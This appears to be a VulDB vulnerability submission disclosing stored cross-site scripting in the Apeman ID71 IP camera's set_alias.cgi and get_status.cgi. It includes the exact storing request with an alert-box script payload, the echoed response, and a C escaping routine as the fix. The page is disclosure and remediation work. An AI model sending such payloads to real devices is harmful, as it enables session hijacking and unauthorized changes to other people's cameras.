Submit #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting info

Title: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
Description: The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session.

To store the XSS we can use the following request:

    # Request
    GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1
    Host: 192.168.1.151:53370

To retrieve the stored value use the following request:

    # Request
    GET /get_status.cgi HTTP/1.1
    Host: 192.168.1.151:53370
    .....

    # Response:
    HTTP/1.1 200 OK
    Date: Sat Oct 4 11:52:04 2025
    Server: GoAhead-Webs

    var alias="<script>alert(1)</script>";
    var deviceid="VSTD1744XXXXX";
    var sys_ver="x.x.x.x";
    var app_version="EN75.8.53.20";
    var oem_id="XXXX";
    var now=17595XXXXXX;
    ...SNIP....

Impact
- Confidentiality: High — theft of session tokens, credentials, and configuration data
- Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users)

Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md

Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
Source: ⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
User: juliourena (UID 90207)
Submission: 04/10/2025 15:01 (8 months ago)
Moderation: 16/10/2025 13:29 (12 days later)
Status: accepted
VulDB entry: 328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias cross site scripting]
Points: 20
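
The missing step the description names is context-appropriate encoding of `alias` before it is written into the `var alias="...";` line. The following is an added example, not code from the vendor firmware or from the submitter's PoC; the function names `js_string_escape` and `render_alias_var` are hypothetical, and it assumes the alias is UTF-8 text.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copy `in` to `out` as the body of a JavaScript string
 * literal. ASCII letters, digits, space and "_-.," pass through; every other
 * ASCII byte becomes \xHH, so it cannot close the string, open a tag or start
 * an escape. Bytes >= 0x80 pass through (assumed UTF-8).
 * Returns the length written, or -1 if `out` is too small. */
static int js_string_escape(const char *in, char *out, size_t outsz)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;

    if (outsz == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        int safe = *p >= 0x80 || isalnum(*p) || strchr(" _-.,", *p) != NULL;
        if (o + (safe ? 1 : 4) + 1 > outsz)
            return -1;              /* refuse rather than cut an escape short */
        if (safe) {
            out[o++] = (char)*p;
        } else {
            out[o++] = '\\';
            out[o++] = 'x';
            out[o++] = hex[*p >> 4];
            out[o++] = hex[*p & 0x0f];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Build the line that the page shows get_status.cgi emitting. */
static int render_alias_var(const char *alias, char *out, size_t outsz)
{
    char esc[256];
    if (js_string_escape(alias, esc, sizeof esc) < 0)
        return -1;
    int n = snprintf(out, outsz, "var alias=\"%s\";\n", esc);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

int main(void)
{
    char line[512];
    /* Constructed input: the alias value used in the request on this page. */
    if (render_alias_var("<script>alert(1)</script>", line, sizeof line) > 0)
        fputs(line, stdout);
    return 0;
}
```

With this encoding the stored value reaches the browser as inert string data, and a page that later writes the alias into HTML still needs HTML encoding at that point.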
